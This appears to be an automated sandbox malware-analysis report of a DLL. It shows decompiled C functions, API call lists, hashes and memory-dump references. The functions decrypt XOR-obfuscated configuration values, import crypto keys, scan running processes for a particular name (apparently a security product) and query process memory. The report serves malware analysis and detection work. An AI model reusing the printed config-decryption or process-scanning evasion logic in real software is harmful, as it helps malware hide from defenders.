Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 144e7c1915c86dccbb78b00ff05a9e509790ce60b46f5713f0f5ba6d34b21dd3
Instruction ID: 82c6738bae008bb09748a572394b91b6af987cc213fc12aa3f70b46fa3aec1a5
Opcode Fuzzy Hash: 144e7c1915c86dccbb78b00ff05a9e509790ce60b46f5713f0f5ba6d34b21dd3
Instruction Fuzzy Hash: 1BF0E776D01258EFDB00EBD5C489AEDB7B8FF04314F1484AAE506A7241D7B4AB84DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00DE49FE, Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00DE49FE(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E00DE39C5( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E00DE6837(_a8 + _a8);
					if(_t21 != 0) {
						E00DE2E61(_a4, _t21, _t23);
					}
					E00DE50CA(_a4);
				}
				return _t21;
			}

0x00de4a06
0x00de4a0d
0x00de4a0f
0x00de4a1e
0x00de4a25
0x00de4a34
0x00de4a38
0x00de4a3f
0x00de4a3f
0x00de4a47
0x00de4a4c
0x00de4a51

APIs

lstrlen.KERNEL32(00000000,00000000,00DE70D9,00000000,?,00DE62B1,00000000,00DE70D9,?,00000000,00DE70D9,00000000,03D19630), ref: 00DE4A0F

Part of subcall function 00DE39C5: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,00DE4A23,00000001,00DE70D9,00000000), ref: 00DE39FD
Part of subcall function 00DE39C5: memcpy.NTDLL(00DE4A23,00DE70D9,00000010,?,?,?,00DE4A23,00000001,00DE70D9,00000000,?,00DE62B1,00000000,00DE70D9,?,00000000), ref: 00DE3A16
Part of subcall function 00DE39C5: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 00DE3A3F
Part of subcall function 00DE39C5: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 00DE3A57
Part of subcall function 00DE39C5: memcpy.NTDLL(00000000,00000000,03D19630,00000010), ref: 00DE3AA9

Part of subcall function 00DE6837: RtlAllocateHeap.NTDLL(00000000,00000000,00DE4197), ref: 00DE6843

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: 85f5f41718138b33a2539338469c33a5871d1e091bfc45c208d01f1b05ee516d
Instruction ID: 6b98f5f4e5d77708dd362ae35a92a89ed418585f23a5c548c4410755ba311fb3
Opcode Fuzzy Hash: 85f5f41718138b33a2539338469c33a5871d1e091bfc45c208d01f1b05ee516d
Instruction Fuzzy Hash: 69F01776100148BACF12BE6ADC40DEF3FAEEF857A4B048022BD088A111DA31DA559BB0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00DE2206, Relevance: 10.7, APIs: 7, Instructions: 204
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00DE2206(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				intOrPtr _t50;
				signed int _t56;
				void* _t58;
				void* _t59;
				signed int _t61;
				signed int _t65;
				signed int _t69;
				signed int _t73;
				signed int _t77;
				signed int _t81;
				void* _t86;
				intOrPtr _t102;

				_t87 = __ecx;
				_t26 =  *0xdea2d0; // 0x63699bc3
				if(E00DE1BCB( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x110) {
					 *0xdea324 = _v8;
				}
				_t31 =  *0xdea2d0; // 0x63699bc3
				if(E00DE1BCB( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L50:
					return _v12;
				}
				_t37 =  *0xdea2d0; // 0x63699bc3
				if(E00DE1BCB( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L48:
					HeapFree( *0xdea290, 0, _v16);
					goto L50;
				} else {
					_t86 = _v12;
					if(_t86 == 0) {
						_t43 = 0;
					} else {
						_t81 =  *0xdea2d0; // 0x63699bc3
						_t43 = E00DE38CE(_t87, _t86, _t81 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0xdea298 = _v8;
						}
					}
					if(_t86 == 0) {
						_t44 = 0;
					} else {
						_t77 =  *0xdea2d0; // 0x63699bc3
						_t44 = E00DE38CE(_t87, _t86, _t77 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0xdea29c = _v8;
						}
					}
					if(_t86 == 0) {
						_t45 = 0;
					} else {
						_t73 =  *0xdea2d0; // 0x63699bc3
						_t45 = E00DE38CE(_t87, _t86, _t73 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0xdea2a0 = _v8;
						}
					}
					if(_t86 == 0) {
						_t46 = 0;
					} else {
						_t69 =  *0xdea2d0; // 0x63699bc3
						_t46 = E00DE38CE(_t87, _t86, _t69 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0xdea004 = _v8;
						}
					}
					if(_t86 == 0) {
						_t47 = 0;
					} else {
						_t65 =  *0xdea2d0; // 0x63699bc3
						_t47 = E00DE38CE(_t87, _t86, _t65 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t87 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0xdea02c = _v8;
						}
					}
					if(_t86 == 0) {
						_t48 = 0;
					} else {
						_t61 =  *0xdea2d0; // 0x63699bc3
						_t48 = E00DE38CE(_t87, _t86, _t61 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t58 = 0x10;
						_t59 = E00DE3E49(_t58);
						if(_t59 != 0) {
							_push(_t59);
							E00DE50DF();
						}
					}
					if(_t86 == 0) {
						_t49 = 0;
					} else {
						_t56 =  *0xdea2d0; // 0x63699bc3
						_t49 = E00DE38CE(_t87, _t86, _t56 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E00DE3E49(0, _t49) != 0) {
						_t102 =  *0xdea37c; // 0x3d19630
						E00DE10DD(_t102 + 4, _t54);
					}
					_t50 =  *0xdea2d4; // 0x2f2d5a8
					_t20 = _t50 + 0xdeb252; // 0x3d187fa
					_t21 = _t50 + 0xdeb7b5; // 0x6976612e
					 *0xdea320 = _t20;
					 *0xdea390 = _t21;
					HeapFree( *0xdea290, 0, _t86);
					_v12 = 0;
					goto L48;
				}
			}

0x00de2206
0x00de2209
0x00de2229
0x00de2237
0x00de2237
0x00de223c
0x00de2256
0x00de242a
0x00de2431
0x00de2438
0x00de2438
0x00de225c
0x00de2278
0x00de2418
0x00de2422
0x00000000
0x00de227e
0x00de227e
0x00de2283
0x00de2299
0x00de2285
0x00de2285
0x00de2292
0x00de2292
0x00de22a3
0x00de22a5
0x00de22af
0x00de22b4
0x00de22b4
0x00de22af
0x00de22bb
0x00de22d1
0x00de22bd
0x00de22bd
0x00de22ca
0x00de22ca
0x00de22d5
0x00de22d7
0x00de22e1
0x00de22e6
0x00de22e6
0x00de22e1
0x00de22ed
0x00de2303
0x00de22ef
0x00de22ef
0x00de22fc
0x00de22fc
0x00de2307
0x00de2309
0x00de2313
0x00de2318
0x00de2318
0x00de2313
0x00de231f
0x00de2335
0x00de2321
0x00de2321
0x00de232e
0x00de232e
0x00de2339
0x00de233b
0x00de2345
0x00de234a
0x00de234a
0x00de2345
0x00de2351
0x00de2367
0x00de2353
0x00de2353
0x00de2360
0x00de2360
0x00de236b
0x00de236d
0x00de2377
0x00de237c
0x00de237c
0x00de2377
0x00de2383
0x00de2399
0x00de2385
0x00de2385
0x00de2392
0x00de2392
0x00de239d
0x00de239f
0x00de23a2
0x00de23a3
0x00de23aa
0x00de23ac
0x00de23ad
0x00de23ad
0x00de23aa
0x00de23b4
0x00de23ca
0x00de23b6
0x00de23b6
0x00de23c3
0x00de23c3
0x00de23ce
0x00de23dc
0x00de23e6
0x00de23e6
0x00de23eb
0x00de23f1
0x00de23fe
0x00de2404
0x00de240a
0x00de240f
0x00de2415
0x00000000
0x00de2415

APIs

StrToIntExA.SHLWAPI(00000000,00000000,00DE55D3,?,00DE55D3,63699BC3,?,?,63699BC3,00DE55D3,?,63699BC3,E8FA7DD7,00DEA00C,745EC740), ref: 00DE22AB
StrToIntExA.SHLWAPI(00000000,00000000,00DE55D3,?,00DE55D3,63699BC3,?,?,63699BC3,00DE55D3,?,63699BC3,E8FA7DD7,00DEA00C,745EC740), ref: 00DE22DD
StrToIntExA.SHLWAPI(00000000,00000000,00DE55D3,?,00DE55D3,63699BC3,?,?,63699BC3,00DE55D3,?,63699BC3,E8FA7DD7,00DEA00C,745EC740), ref: 00DE230F
StrToIntExA.SHLWAPI(00000000,00000000,00DE55D3,?,00DE55D3,63699BC3,?,?,63699BC3,00DE55D3,?,63699BC3,E8FA7DD7,00DEA00C,745EC740), ref: 00DE2341
StrToIntExA.SHLWAPI(00000000,00000000,00DE55D3,?,00DE55D3,63699BC3,?,?,63699BC3,00DE55D3,?,63699BC3,E8FA7DD7,00DEA00C,745EC740), ref: 00DE2373
HeapFree.KERNEL32(00000000,?,?,00DE55D3,63699BC3,?,?,63699BC3,00DE55D3,?,63699BC3,E8FA7DD7,00DEA00C,745EC740), ref: 00DE240F
HeapFree.KERNEL32(00000000,?,?,00DE55D3,63699BC3,?,?,63699BC3,00DE55D3,?,63699BC3,E8FA7DD7,00DEA00C,745EC740), ref: 00DE2422

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c781445f6e732bc8a1a52f2d15ae3483e09a2abae1662b7a82a5d0277f0054c4
Instruction ID: 6eeec0f12123ce4533fa6934305336fe3e44adc99d34195823d93c17aaecf862
Opcode Fuzzy Hash: c781445f6e732bc8a1a52f2d15ae3483e09a2abae1662b7a82a5d0277f0054c4
Instruction Fuzzy Hash: D1616471A002C5ABC711FBBADCC9C6F77EDEB48700B280956B502EB255E635EE409B35

Uniqueness

Uniqueness Score: -1.00%

Function 6D472485, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D472485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6d4741f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6d474240 = 1;
										__eflags =  *0x6d474240;
										if( *0x6d474240 != 0) {
											goto L60;
										}
										_t84 =  *0x6d4741f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6d474240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6d4741f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6d474200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6d4741fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6d474200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6d474200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6d474240 = 1;
							__eflags =  *0x6d474240;
							if( *0x6d474240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6d474200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6d474200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6d474240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6d474200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6d4741f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6d474200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6d474200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

0x6d47248f
0x6d472492
0x6d472498
0x6d4724b6
0x00000000
0x6d4724b6
0x6d4724a0
0x6d4724a9
0x6d4724af
0x6d4724be
0x6d4724c1
0x6d4724c4
0x6d4724ce
0x6d4724ce
0x6d4724d0
0x6d4724d3
0x6d4724d5
0x6d4724d5
0x6d4724d7
0x6d4724da
0x00000000
0x00000000
0x6d4724dc
0x6d4724de
0x6d472544
0x6d472544
0x6d4726a2
0x00000000
0x6d4726a2
0x6d4724e0
0x6d4724e0
0x6d4724e4
0x6d4724e6
0x6d4724e6
0x6d4724e6
0x6d4724e6
0x6d4724e9
0x6d4724ea
0x6d4724ed
0x6d4724ed
0x6d4724f1
0x6d4724f5
0x6d472503
0x6d472503
0x6d47250b
0x6d472511
0x6d472513
0x6d472515
0x6d472525
0x6d472532
0x6d472536
0x6d47253b
0x6d47253d
0x6d4725bb
0x6d4725bb
0x6d47253f
0x6d47253f
0x6d47253f
0x6d4725bd
0x6d4725bf
0x6d4726a0
0x6d4726a0
0x00000000
0x6d4725c5
0x6d4725c5
0x6d4725cc
0x00000000
0x00000000
0x6d4725d2
0x6d4725d6
0x6d472632
0x6d472634
0x6d47263c
0x6d47263e
0x6d472640
0x00000000
0x00000000
0x6d472642
0x6d472648
0x6d47264a
0x6d47264c
0x6d472661
0x6d472661
0x6d472663
0x6d472692
0x6d472699
0x00000000
0x6d472699
0x6d472667
0x6d472668
0x6d47266a
0x6d47266c
0x6d47266c
0x6d47266e
0x6d472670
0x6d472672
0x6d472686
0x6d472686
0x6d472689
0x6d47268b
0x6d47268b
0x6d47268c
0x6d47268c
0x00000000
0x6d472674
0x6d472674
0x6d472674
0x6d47267d
0x6d47267e
0x6d472680
0x6d472682
0x6d472682
0x00000000
0x6d472674
0x6d472672
0x6d47264e
0x6d472655
0x6d472655
0x6d472657
0x00000000
0x00000000
0x6d472659
0x6d47265a
0x6d47265d
0x6d47265f
0x00000000
0x00000000
0x00000000
0x6d47265f
0x00000000
0x6d472655
0x6d4725d8
0x6d4725db
0x6d4725e0
0x00000000
0x00000000
0x6d4725e9
0x6d4725eb
0x6d4725f1
0x00000000
0x00000000
0x6d4725f7
0x6d4725fd
0x00000000
0x00000000
0x6d472603
0x6d472605
0x6d47260e
0x6d472612
0x00000000
0x00000000
0x6d472618
0x6d47261b
0x6d47261d
0x00000000
0x00000000
0x6d472624
0x6d472626
0x00000000
0x00000000
0x6d472628
0x6d47262c
0x00000000
0x00000000
0x00000000
0x6d47262c
0x00000000
0x00000000
0x00000000
0x6d472517
0x6d472517
0x6d472517
0x6d47251e
0x00000000
0x00000000
0x6d472520
0x6d472521
0x6d472523
0x00000000
0x00000000
0x00000000
0x6d472523
0x6d47254b
0x6d47254d
0x00000000
0x00000000
0x6d47255d
0x6d47255f
0x6d472561
0x00000000
0x00000000
0x6d472567
0x6d47256e
0x6d47259a
0x6d47259a
0x6d47259c
0x6d47259e
0x6d4725b2
0x6d4725b4
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4725a0
0x6d4725a0
0x6d4725a0
0x6d4725a9
0x6d4725aa
0x6d4725ac
0x6d4725ae
0x6d4725ae
0x00000000
0x6d4725a0
0x6d472570
0x6d472573
0x6d472575
0x6d472587
0x6d472587
0x6d47258a
0x6d47258c
0x6d47258c
0x6d47258d
0x6d47258d
0x6d472593
0x00000000
0x00000000
0x00000000
0x00000000
0x6d472577
0x6d472577
0x6d472577
0x6d47257e
0x00000000
0x00000000
0x6d472580
0x6d472580
0x6d472581
0x00000000
0x00000000
0x00000000
0x6d472581
0x6d472583
0x6d472585
0x6d472598
0x00000000
0x00000000
0x00000000
0x6d472598
0x00000000
0x6d472585
0x6d4724f7
0x6d4724fa
0x6d4724fd
0x00000000
0x00000000
0x6d4724ff
0x6d472501
0x00000000
0x00000000
0x00000000
0x6d472501
0x6d4724c6
0x6d4724c8
0x00000000
0x00000000
0x00000000
0x00000000

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6D472536

Strings

@BGm, xrefs: 6D472555
@BGm, xrefs: 6D472637
@BGm, xrefs: 6D472694

Memory Dump Source

Source File: 00000000.00000002.924973104.000000006D471000.00000020.00020000.sdmp, Offset: 6D470000, based on PE: true

Associated: 00000000.00000002.924964633.000000006D470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924982992.000000006D473000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.924990837.000000006D475000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.924998738.000000006D476000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d470000_loaddll32.jbxd

Similarity

API ID: MemoryQueryVirtual
String ID: @BGm$@BGm$@BGm
API String ID: 2850889275-71455144
Opcode ID: 3d401b4a7e39961c6cc207fd88a7bf2c0013c23d9df278e0c15823683cdafc9e
Instruction ID: c328cc090dbd8eb7d00b2471d02ba6dd3410953fc389460d81011c609d6067cc
Opcode Fuzzy Hash: 3d401b4a7e39961c6cc207fd88a7bf2c0013c23d9df278e0c15823683cdafc9e
Instruction Fuzzy Hash: 816181307046129BDB35CE28D8E0FE973B6FB86398B348569D556D7390EF30DC828690

Uniqueness

Uniqueness Score: -1.00%

Function 6D489540, Relevance: 6.1, APIs: 4, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_wcscmp.LIBCMT ref: 6D489557
_wcscmp.LIBCMT ref: 6D489568
GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 6D489584
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 6D4895AE

Memory Dump Source

Source File: 00000000.00000002.925010654.000000006D47E000.00000020.00020000.sdmp, Offset: 6D47E000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d47e000_loaddll32.jbxd

Similarity

API ID: InfoLocale_wcscmp
String ID:
API String ID: 1351282208-0
Opcode ID: 29fd5d2fdcf7fd91da11202afbb22d1c90dedb2150aaeb501ec00425238dddf7
Instruction ID: e3d3fdd82839ad5addae8441886cde90ea15ca66919131aa2f78a2ffcecbb997
Opcode Fuzzy Hash: 29fd5d2fdcf7fd91da11202afbb22d1c90dedb2150aaeb501ec00425238dddf7
Instruction Fuzzy Hash: 8E017937605616FBEB029E55EC84FDA77B8AF097D5F108029F908DA242E731DE8187D4

Uniqueness

Uniqueness Score: -1.00%

Function 00DE513E, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00DE513E() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0xdea2d4; // 0x2f2d5a8
						_t2 = _t9 + 0xdebdd4; // 0x73617661
						_push( &_v264);
						if( *0xdea118() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x00de5149
0x00de5153
0x00de5157
0x00de5161
0x00de5192
0x00de5168
0x00de516d
0x00de517a
0x00de5183
0x00de519a
0x00de5185
0x00de518d
0x00000000
0x00de518d
0x00de519b
0x00de519c
0x00000000
0x00de519c
0x00000000
0x00de5196
0x00de51a2
0x00de51a7

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00DE514E
Process32First.KERNEL32(00000000,?), ref: 00DE5161
Process32Next.KERNEL32(00000000,?), ref: 00DE518D
CloseHandle.KERNEL32(00000000), ref: 00DE519C

Memory Dump Source

Source File: 00000000.00000002.923643404.0000000000DE1000.00000020.00000001.sdmp, Offset: 00DE0000, based on PE: true

Associated: 00000000.00000002.923635476.0000000000DE0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923663307.0000000000DE9000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.923676285.0000000000DEA000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.923685675.0000000000DEC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_de0000_loaddll32.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 14dd2c9ff0b3cbdb480c9bc1796a37085cb47b1a334016f83cb9698483ffbdb0
Instruction ID: 6b185fa55de3affe2e1563b8bd9529eddf777758de1ca1e3fa565f7696eb523b
Opcode Fuzzy Hash: 14dd2c9ff0b3cbdb480c9bc1796a37085cb47b1a334016f83cb9698483ffbdb0
Instruction Fuzzy Hash: FFF02B312017A566D720BB37AC49FEB73ACDBC5394F040161F949D7104E630DE4687B2

Uniqueness

Uniqueness Score: -1.00%

Function 6D471F10, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D471F10() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6d4741b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6d4741bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6d4741ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6d4741a8 = _t5;
					 *0x6d4741b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6d4741a4 = _t6;
					if(_t6 == 0) {
						 *0x6d4741a4 =  *0x6d4741a4 | 0xffffffff;
					}
					return 0;
				}
			}

0x6d471f11
0x6d471f1f
0x6d471f27
0x6d471f2c
0x6d471f76
0x6d471f76
0x6d471f2e
0x6d471f36
0x6d471f72
0x6d471f74
0x6d471f38
0x6d471f38
0x6d471f3d
0x6d471f4b
0x6d471f50
0x6d471f56
0x6d471f5e
0x6d471f63
0x6d471f65
0x6d471f65
0x6d471f6f
0x6d471f6f

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D471C8E,73B763F0,00000000), ref: 6D471F1F
GetVersion.KERNEL32 ref: 6D471F2E
GetCurrentProcessId.KERNEL32 ref: 6D471F3D
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D471F56

Memory Dump Source

Source File: 00000000.00000002.924973104.000000006D471000.00000020.00020000.sdmp, Offset: 6D470000, based on PE: true

